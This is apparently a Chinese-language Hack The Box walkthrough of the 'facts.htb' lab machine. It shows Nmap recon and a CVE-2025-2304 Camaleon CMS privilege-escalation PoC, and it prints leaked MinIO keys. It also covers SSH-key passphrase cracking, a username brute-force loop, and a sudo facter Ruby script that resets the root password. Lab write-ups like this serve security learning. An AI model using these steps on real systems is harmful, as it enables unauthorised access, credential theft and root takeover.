目标信息
IP地址:
10.129.142.139(非固定IP地址)
信息收集
ICMP检测
PING 10.129.142.139 (10.129.142.139) 56(84) bytes of data.
64 bytes from 10.129.142.139: icmp_seq=1 ttl=63 time=118 ms
64 bytes from 10.129.142.139: icmp_seq=2 ttl=63 time=140 ms
64 bytes from 10.129.142.139: icmp_seq=3 ttl=63 time=162 ms
64 bytes from 10.129.142.139: icmp_seq=4 ttl=63 time=85.2 ms
--- 10.129.142.139 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3006ms
rtt min/avg/max/mdev = 85.235/126.498/162.291/28.490 ms攻击机和靶机间网络连接良好。
防火墙检测
# Nmap 7.98 scan initiated Sun Feb 1 13:25:25 2026 as: /usr/lib/nmap/nmap -sF -p- --min-rate 3000 -oN fin_result.txt 10.129.142.139
Warning: 10.129.142.139 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.142.139
Host is up (0.17s latency).
All 65535 scanned ports on 10.129.142.139 are in ignored states.
Not shown: 64891 closed tcp ports (reset), 644 open|filtered tcp ports (no-response)
# Nmap done at Sun Feb 1 13:26:50 2026 -- 1 IP address (1 host up) scanned in 84.59 seconds无法探测靶机防火墙状态。
网络端口扫描
TCP端口扫描结果
# Nmap 7.98 scan initiated Sun Feb 1 13:40:15 2026 as: /usr/lib/nmap/nmap -sT -sV -A -p- --min-rate 3000 -oN tcp_result.txt 10.129.142.139
Warning: 10.129.142.139 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.142.139
Host is up (0.086s latency).
Not shown: 62150 closed tcp ports (conn-refused), 3382 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.9p1 Ubuntu 3ubuntu3.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 4d:d7:b2:8c:d4:df:57:9c:a4:2f:df:c6:e3:01:29:89 (ECDSA)
|_ 256 a3:ad:6b:2f:4a:bf:6f:48:ac:81:b9:45:3f:de:fb:87 (ED25519)
80/tcp open http nginx 1.26.3 (Ubuntu)
|_http-server-header: nginx/1.26.3 (Ubuntu)
|_http-title: Did not follow redirect to http://facts.htb/
54321/tcp open http Golang net/http server
|_http-title: Did not follow redirect to http://10.129.142.139:9001
|_http-server-header: MinIO
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 400 Bad Request
| Accept-Ranges: bytes
| Content-Length: 303
| Content-Type: application/xml
| Server: MinIO
| Strict-Transport-Security: max-age=31536000; includeSubDomains
| Vary: Origin
| X-Amz-Id-2: dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8
| X-Amz-Request-Id: 189008F1F4D68427
| X-Content-Type-Options: nosniff
| X-Xss-Protection: 1; mode=block
| Date: Sun, 01 Feb 2026 05:41:28 GMT
| <?xml version="1.0" encoding="UTF-8"?>
| <Error><Code>InvalidRequest</Code><Message>Invalid Request (invalid argument)</Message><Resource>/nice ports,/Trinity.txt.bak</Resource><RequestId>189008F1F4D68427</RequestId><HostId>dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8</HostId></Error>
| GenericLines, Help, RTSPRequest, SSLSessionReq:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 400 Bad Request
| Accept-Ranges: bytes
| Content-Length: 276
| Content-Type: application/xml
| Server: MinIO
| Strict-Transport-Security: max-age=31536000; includeSubDomains
| Vary: Origin
| X-Amz-Id-2: dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8
| X-Amz-Request-Id: 189008EDF3138576
| X-Content-Type-Options: nosniff
| X-Xss-Protection: 1; mode=block
| Date: Sun, 01 Feb 2026 05:41:11 GMT
| <?xml version="1.0" encoding="UTF-8"?>
| <Error><Code>InvalidRequest</Code><Message>Invalid Request (invalid argument)</Message><Resource>/</Resource><RequestId>189008EDF3138576</RequestId><HostId>dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8</HostId></Error>
| HTTPOptions:
| HTTP/1.0 200 OK
| Vary: Origin
| Date: Sun, 01 Feb 2026 05:41:11 GMT
|_ Content-Length: 0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port54321-TCP:V=7.98%I=7%D=2/1%Time=697EE777%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,67,"HTTP/1.1x20400x20Badx20RequestrnContent-Type:x20t
SF:ext/plain;x20charset=utf-8rnConnection:x20closernrn400x20Badx
SF:20Request")%r(GetRequest,2B0,"HTTP/1.0x20400x20Badx20RequestrnAcc
SF:ept-Ranges:x20bytesrnContent-Length:x20276rnContent-Type:x20appl
SF:ication/xmlrnServer:x20MinIOrnStrict-Transport-Security:x20max-ag
SF:e=31536000;x20includeSubDomainsrnVary:x20OriginrnX-Amz-Id-2:x20d
SF:d9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8rnX-Am
SF:z-Request-Id:x20189008EDF3138576rnX-Content-Type-Options:x20nosniff
SF:rnX-Xss-Protection:x201;x20mode=blockrnDate:x20Sun,x2001x20Feb
SF:x202026x2005:41:11x20GMTrnrn<?xmlx20version="1.0"x20encodi
SF:ng="UTF-8"?>n<Error><Code>InvalidRequest</Code><Message>Invalidx20
SF:Requestx20(invalidx20argument)</Message><Resource>/</Resource><Requ
SF:estId>189008EDF3138576</RequestId><HostId>dd9025bab4ad464b049177c95eb6e
SF:bf374d3b3fd1af9251148b658df7ac2e3e8</HostId></Error>")%r(HTTPOptions,59
SF:,"HTTP/1.0x20200x20OKrnVary:x20OriginrnDate:x20Sun,x2001x20F
SF:ebx202026x2005:41:11x20GMTrnContent-Length:x200rnrn")%r(RTSPR
SF:equest,67,"HTTP/1.1x20400x20Badx20RequestrnContent-Type:x20text/
SF:plain;x20charset=utf-8rnConnection:x20closernrn400x20Badx20Re
SF:quest")%r(Help,67,"HTTP/1.1x20400x20Badx20RequestrnContent-Type:
SF:x20text/plain;x20charset=utf-8rnConnection:x20closernrn400x20B
SF:adx20Request")%r(SSLSessionReq,67,"HTTP/1.1x20400x20Badx20Request
SF:rnContent-Type:x20text/plain;x20charset=utf-8rnConnection:x20clos
SF:ernrn400x20Badx20Request")%r(FourOhFourRequest,2CB,"HTTP/1.0x20
SF:400x20Badx20RequestrnAccept-Ranges:x20bytesrnContent-Length:x20
SF:303rnContent-Type:x20application/xmlrnServer:x20MinIOrnStrict-T
SF:ransport-Security:x20max-age=31536000;x20includeSubDomainsrnVary:x
SF:20OriginrnX-Amz-Id-2:x20dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9
SF:251148b658df7ac2e3e8rnX-Amz-Request-Id:x20189008F1F4D68427rnX-Cont
SF:ent-Type-Options:x20nosniffrnX-Xss-Protection:x201;x20mode=blockr
SF:nDate:x20Sun,x2001x20Febx202026x2005:41:28x20GMTrnrn<?xmlx
SF:20version="1.0"x20encoding="UTF-8"?>n<Error><Code>InvalidReques
SF:t</Code><Message>Invalidx20Requestx20(invalidx20argument)</Message
SF:><Resource>/nicex20ports,/Trinity.txt.bak</Resource><RequestId>18900
SF:8F1F4D68427</RequestId><HostId>dd9025bab4ad464b049177c95eb6ebf374d3b3fd
SF:1af9251148b658df7ac2e3e8</HostId></Error>");
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using proto 1/icmp)
HOP RTT ADDRESS
1 90.85 ms 10.10.16.1
2 137.27 ms 10.129.142.139
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Feb 1 13:41:43 2026 -- 1 IP address (1 host up) scanned in 88.65 secondsUDP端口开放列表扫描结果
# Nmap 7.98 scan initiated Sun Feb 1 13:44:14 2026 as: /usr/lib/nmap/nmap -sU -p- --min-rate 3000 -oN udp_ports.txt 10.129.142.139
Warning: 10.129.142.139 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.142.139
Host is up (0.20s latency).
All 65535 scanned ports on 10.129.142.139 are in ignored states.
Not shown: 65286 open|filtered udp ports (no-response), 249 closed udp ports (port-unreach)
# Nmap done at Sun Feb 1 13:48:21 2026 -- 1 IP address (1 host up) scanned in 247.08 secondsUDP端口详细信息扫描结果
(无)可发现靶机为Ubuntu Linux操作系统,开放了22/ssh、80/http和54321/http三个服务,主域名为facts.htb,其中54321/http服务默认会将访问请求重定向的一个未开放9001/http端口。
服务探测
SSH服务(22端口)
使用ssh命令连接靶机,尝试确定其登录方式:
ssh root@facts.htb
靶机SSH服务允许使用密钥和密码登录。
Web应用程序(54321端口)
在网络端口扫描阶段,我们已经从Nmap扫描报告中获取了有关54321端口的一些Banner信息:
在响应头中发现了Server字段,值为MinIO,似乎该Web服务实际为MinIO存储桶,同时还在响应内容中发现/nice和/Trinity.txt.bak两个URI,貌似对应着存储桶名称和其中的文件。
尝试使用MinIO客户端工具,添加该存储桶地址,并向该Web服务发送Ping请求:GitHub - minio/mc: Unix like utilities for object store
./minio_client alias set htb_facts http://facts.htb:54321
./minio_client ping htb_facts -c 4
发现Web服务向MinIO客户端返回了符合格式的响应包,确认该服务为MinIO存储桶服务。
Web应用程序(80端口)
打开主页:http://facts.htb/
发现该站点似乎为一个小型博客网站。点击Start Exploring按钮,发现跳转到了帖子浏览页面,帖子下方评论区有三个英文名Bob、Carol和Dave:
查看该页面源代码,发现网页head标签内定义了一个元数据twitter:image,其URL路径值中存在camaleon_cms目录名:
<meta name="twitter:image" content="http://facts.htb/assets/camaleon_cms/image-not-found-fc3c0e66dc61abf74010e63ef65a2e23c4cb40a3320408f2711f82fdc22b503f.png">联网搜索Camaleon CMS,发现为一款使用Ruby编写的内容管理系统:
从GitHub源代码文件./config/system.json中,我们还可以发现该CMS系统控制面板路径为/admin:camaleon-cms/config/system.json at master · owen2345/camaleon-cms · GitHub
直接访问http://facts.htb/admin,出现了管理后台登录页面:
令人意外的是该CMS后台还提供了新用户注册功能。点击Create an account链接,新建一个用户登录:
登录成功后,点击页面右上角用户名,访问Profile页面,发现当前为最低权限用户Client:
以及Camaleon CMS版本为v2.9.0。
渗透测试
Camaleon CMS提权漏洞利用
在服务探测阶段,我们成功发现了靶机80/http服务运行Camaleon CMS,并且通过注册低权限用户进入管理后台,随后确定了其版本。通过联网搜索,我们可以发现该版本Camaleon CMS存在权限提升漏洞CVE-2025-2304:GitHub - d3vn0mi/cve-2025-2304-poc
直接将利用脚本下载到本地:
git clone https://github.com/d3vn0mi/cve-2025-2304-poc.git随后执行利用命令:
python ./cve-2025-2304-poc/cve-2025-2304.py http://facts.htb -u misaka19008 -p "Asd310056"接着刷新网页再次登录:
发现成功获取管理员权限!
获取密钥访问敏感存储桶
获得管理员权限后翻看后台。点击Settings => General Site跳转至站点基本配置页面,发现存在Filesystem Settings标签页:
成功获取MinIO访问密钥:
- 地址:
http://facts.htb:54321 - 访问密钥:
AKIAF27007C687BC0386 - 私有密钥:
5EJrV7Yq1XluNwsk2NzrY55gJNkg0xaRFcl0P7n5
直接更新MinIO Client配置,输入密钥:
./minio_client alias set htb_facts http://facts.htb:54321随后列出存储桶:
./minio_client ls htb_facts
发现存在名为internal的存储桶,列出其目录:
./minio_client ls htb_facts/internal
存储桶内为某用户家目录备份,且存在.ssh目录,直接列出其文件:
./minio_client ls htb_facts/internal/.ssh
成功发现SSH私钥id_ed25519!将其下载到本地:
./minio_client get htb_facts/internal/.ssh/id_ed25519 ./htb_facts_sshkey爆破SSH用户名与私钥口令
在先前的渗透测试过程中,我们已经发现MinIO访问密钥并获取了SSH私钥。现在尝试使用ssh2john工具确认私钥是否加密:
ssh2john htb_facts_sshkey
发现该私钥文件加密,直接保存到文件内,使用john工具破解口令:
john sshkey_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
成功发现SSH密钥口令:dragonballz,但现在还不知道SSH私钥对应的用户名。经分析研判,决定编写简易脚本,读取用户名字典中的每个用户,循环执行ssh命令,并使用ssh命令的-o参数添加临时配置,禁止使用密码登录,这样当读取到错误的用户名时,就不会等待密码输入,而是直接输出登录失败提示。
首先制作用户名字典:
cewl -w word.lst http://facts.htb制作完成后,编写循环脚本执行:
for i in $(cat word.lst); do
ssh $i@facts.htb -i ./htb_facts_sshkey -o PasswordAuthentication=no
done
发现SSH脚本读取到了正确的用户名(为SECTION的下一个),提示输入密钥口令。查看word.lst,发现正确的用户名为trivia:
成功发现系统用户凭据:
- 用户名:
trivia SSH密钥口令:dragonballz
直接登录:
ssh trivia@facts.htb -i htb_facts_sshkey
SSH登录成功!!
权限提升
Sudo facter命令提权
登录系统后,尝试执行sudo -l命令查询当前用户的sudo权限,发现trivia用户可以通过root身份免密执行/usr/bin/facter程序:
通过联网查询可知,该程序使用Ruby语言编写,作用为汇总并显示主机系统详细信息,可通过--custom-dir参数指定一个含有.rb文件的目录,执行任意的Ruby脚本,由此进行权限提升:facter | GTFOBins
直接在trivia家目录下创建文件夹misaka19008,在该子文件夹内创建脚本文件evil.rb,修改root用户密码:
evil=`echo 'root:Asd310056' | chpasswd`
puts evil赋予其执行权限后,进行提权操作,完成后切换到root用户:
sudo facter --custom-dir=/home/trivia/misaka19008 x
su -
提权成功!!!!